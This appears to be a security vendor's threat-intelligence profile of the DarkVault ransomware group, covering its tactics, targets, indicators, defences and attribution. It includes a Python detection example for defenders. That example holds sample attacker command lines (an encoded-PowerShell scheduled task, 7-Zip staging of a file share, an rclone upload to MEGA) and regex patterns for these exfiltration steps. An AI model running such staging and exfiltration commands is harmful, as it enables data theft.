DarkVault

1. Overview

DarkVault is a relatively new but increasingly active ransomware group. First identified in late 2023, it has quickly established itself as a quiet but formidable actor in the double extortion space. The group targets medium to large organisations across Europe, the UK, and North America, with an emphasis on finance, professional services, logistics, legal, and technology sectors.

Unlike higher-profile groups such as LockBit or Cl0p, DarkVault avoids publicity. It does not maintain a high-traffic leak site and appears to favour private negotiations and discreet extortion tactics. Its operations suggest a focus on data exfiltration over encryption, with minimal forensic traces and rapid execution.


2. Origin and Evolution

DarkVault first came to light in Q4 2023, following an incident in which a mid-sized European investment firm suffered a silent breach, culminating in the exfiltration of sensitive legal and client files without any accompanying ransomware encryption.

Subsequent investigations revealed a pattern of custom malware payloads, PowerShell-based data staging, and carefully targeted phishing used to compromise credentials and move laterally. Over time, DarkVault has expanded its operations, adopting elements of classic ransomware models—such as limited encryption and data leak threats—while maintaining a stealth-first approach.

By early 2024, multiple UK-based organisations had reported breaches attributed to DarkVault, marking it as a growing threat to data-heavy sectors.


3. Tactics, Techniques, and Procedures (TTPs)

DarkVault employs a minimalist yet efficient toolkit, combining bespoke code with living-off-the-land techniques:

  • Initial Access:
    Spear-phishing emails with malicious documents (T1566.001), credential reuse from prior breaches (T1078), and exploitation of misconfigured VPN and cloud storage endpoints (T1190).
  • Lateral Movement:
    Use of RDP, WMI, and custom PowerShell scripts to navigate the network (T1021). The group avoids noisy tools like Cobalt Strike and tends to move laterally without triggering EDR alerts.
  • Data Exfiltration:
    Highly targeted exfiltration using Rclone, MEGA, and secure FTP (T1041). Data is typically compressed with 7-Zip, then staged in cloud storage with time-delayed deletion links.
  • Encryption (optional):
    While many campaigns are exfiltration-only, some incidents involve selective encryption using proprietary ransomware payloads. Encrypted files may have extensions like .dvault or .lockedvault.
  • Persistence & Evasion:
    Registry modification (T1112), scheduled tasks, and use of LOLBins (T1218) are common. Logging and forensic artefacts are deliberately cleaned or overwritten.

4. Targeting Profile

DarkVault targets organisations with low tolerance for data leakage, often in sectors that handle:

  • Intellectual property
  • Regulatory data (e.g., GDPR/PCI)
  • Legal documents and contracts
  • M&A or private equity deal flow
  • Client confidentiality agreements

Frequent target sectors include:

  • Legal and financial services
  • Private equity and wealth management
  • Consulting and professional services
  • Tech and software development firms
  • Logistics and engineering firms

Several UK-based law firms and fintechs have already been named as confirmed victims, though these incidents often remain unreported publicly.


5. Notable Campaigns and Victims

While DarkVault does not operate a public leak site, victim data is occasionally released via:

  • Anonymous file-sharing platforms (e.g., anonfiles, gofile.io)
  • Dark web forums and ransomware affiliate channels
  • Direct leaks to journalists or competitors

Notable but discreetly handled cases include:

  • A UK-based legal advisory firm with exposed M&A documents and NDAs
  • A German logistics software provider, with customer integrations leaked
  • A North American hedge fund, where client financials and LP reports were targeted

Ransom demands are typically in the £100,000 to £2 million range, depending on the size and sensitivity of the exfiltrated data.


6. Ransomware and Leak Site Behaviour

DarkVault does not maintain a persistent leak site. Instead, it employs:

  1. One-time communication portals over TOR
  2. Email-based negotiation, often with PGP signatures
  3. Sample leaks to pressure victims, but not widespread public publication
  4. Short-lived links to data proof-of-concept dumps

This controlled release model is designed to pressure victims without attracting law enforcement or media scrutiny.


7. Technical Indicators

Common indicators associated with DarkVault include:

  • File extensions: .dvault, .lockedvault (where encryption occurs)
  • Ransom note: NOTICE_TO_RECOVER.txt or VAULT_RESTORE.txt
  • Use of rclone.exe, 7z.exe, and PowerShell-based upload scripts
  • Scheduled tasks set with non-standard names like SysHelper or VaultRunner
  • MEGA and FTP upload traces to Eastern European domains

Detection relies on monitoring for archive creation, outbound cloud uploads, and PowerShell obfuscation.
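The following is an added detection example, not part of the profile or of any vendor tooling. It runs the indicators listed above (and the staging/upload chain from section 3) over constructed process-creation records and, beyond per-event matching, correlates archive creation with a subsequent cloud upload on the same host, since that pairing is the signal worth alerting on. Host names, timestamps and command lines are invented for the example.

```python
import re
from datetime import datetime, timedelta
# Constructed process-creation records for this example (host, ISO timestamp, image, command line);
# illustrative records, not real DarkVault telemetry.
SAMPLE_EVENTS = [
    {"host": "FS01", "ts": "2025-05-01T02:10:00", "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmd": 'schtasks /create /tn "SysHelper" /tr "powershell -w hidden -enc SQBFAFgA" /sc minute'},
    {"host": "FS01", "ts": "2025-05-01T02:12:30", "image": "C:\\Users\\Public\\7z.exe",
     "cmd": '7z.exe a -p C:\\Users\\Public\\stage\\legal.7z "D:\\Shares\\Legal\\*"'},
    {"host": "FS01", "ts": "2025-05-01T02:41:00", "image": "C:\\Users\\Public\\rclone.exe",
     "cmd": "rclone.exe copy C:\\Users\\Public\\stage mega:backup --transfers 8"},
    {"host": "WS07", "ts": "2025-05-01T09:00:00", "image": "C:\\Program Files\\7-Zip\\7z.exe",
     "cmd": "7z.exe x C:\\Users\\alice\\Downloads\\report.7z"},  # benign extraction, not staging
    {"host": "WS07", "ts": "2025-05-01T09:05:00", "image": "C:\\Windows\\explorer.exe",
     "cmd": "explorer.exe C:\\Users\\alice\\Desktop\\NOTICE_TO_RECOVER.txt"},
]

# Indicator patterns from the profile: 7-Zip archive creation ('a' command), rclone pushes to
# MEGA/FTP/SFTP remotes, SysHelper/VaultRunner task names, ransom note names and extensions.
ARCHIVE_RE = re.compile(r"\b7z(a|\.exe)?\s+a\b", re.I)
UPLOAD_RE = re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b.*\b(mega|ftp|sftp):", re.I)
TASK_NAME_RE = re.compile(r"/tn\s+\"?(SysHelper|VaultRunner)\"?", re.I)
NOTE_RE = re.compile(r"(NOTICE_TO_RECOVER|VAULT_RESTORE)\.txt|\.(dvault|lockedvault)\b", re.I)
ENC_PS_RE = re.compile(r"powershell.*\s-(e|ec|enc|encodedcommand)\b", re.I)

def classify(event):
    """Return the DarkVault indicator categories one event matches (empty list if none)."""
    cmd = event["cmd"]
    checks = [("archive_creation", ARCHIVE_RE), ("cloud_upload", UPLOAD_RE),
              ("suspicious_task", TASK_NAME_RE), ("ransom_artifact", NOTE_RE),
              ("encoded_powershell", ENC_PS_RE)]
    return [tag for tag, rx in checks if rx.search(cmd)]

def correlate(events, window_minutes=60):
    """Per host, pair an archive creation with a cloud upload inside the window: the
    staging-then-upload sequence is the exfil chain; either step alone is common noise."""
    by_host = {}
    for e in events:
        by_host.setdefault(e["host"], []).append(e)
    chains = []
    for host, evs in by_host.items():
        archives = [e for e in evs if "archive_creation" in classify(e)]
        uploads = [e for e in evs if "cloud_upload" in classify(e)]
        for a in archives:
            for u in uploads:
                gap = datetime.fromisoformat(u["ts"]) - datetime.fromisoformat(a["ts"])
                if timedelta(0) <= gap <= timedelta(minutes=window_minutes):
                    chains.append({"host": host, "archive_at": a["ts"], "upload_at": u["ts"]})
    return chains
```

Against the sample records, FS01 yields one staging-then-upload chain while the WS07 extraction on its own is correctly left unflagged; in production the same logic would consume Sysmon or EDR process events rather than the embedded list.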


8. Defensive Measures and Recommendations

To defend against DarkVault:

  • Enforce MFA on all access points and admin accounts
  • Monitor for PowerShell script execution and exfiltration behaviour
  • Deploy EDR/XDR with cloud upload detection capabilities
  • Segment critical file servers and monitor for unusual ZIP/7Z usage
  • Implement DLP (Data Loss Prevention) tools across cloud and on-prem systems
  • Conduct tabletop exercises for data breach extortion scenarios

DarkVault is stealthy and prefers quiet leverage—visibility and alerting on data movement are key.


9. Attribution and Alliances

Attribution is currently unclear. DarkVault uses custom code and infrastructure, but code analysis suggests a possible fork from older Conti or Avaddon modules. Language artefacts point to Eastern European origins, though this is unconfirmed.

There is no clear evidence of RaaS or affiliate recruitment, indicating a centralised, internal operation. DarkVault may be cooperating with access brokers or partnering with silent actors focused on data monetisation.


10. Conclusion

DarkVault represents a modern evolution of ransomware operations, focused more on data leverage than encryption, and designed to evade publicity and maximise pressure. Its stealth, discretion, and focus on legal and financial sectors make it a growing threat to UK enterprises handling regulated or reputationally sensitive data.

Organisations should prioritise visibility into outbound data movement, adopt resilient segmentation, and prepare for the realities of extortion without encryption.


Author:
Threat Intelligence Team, UK Cyber Defence Ltd
All intelligence current as of May 2025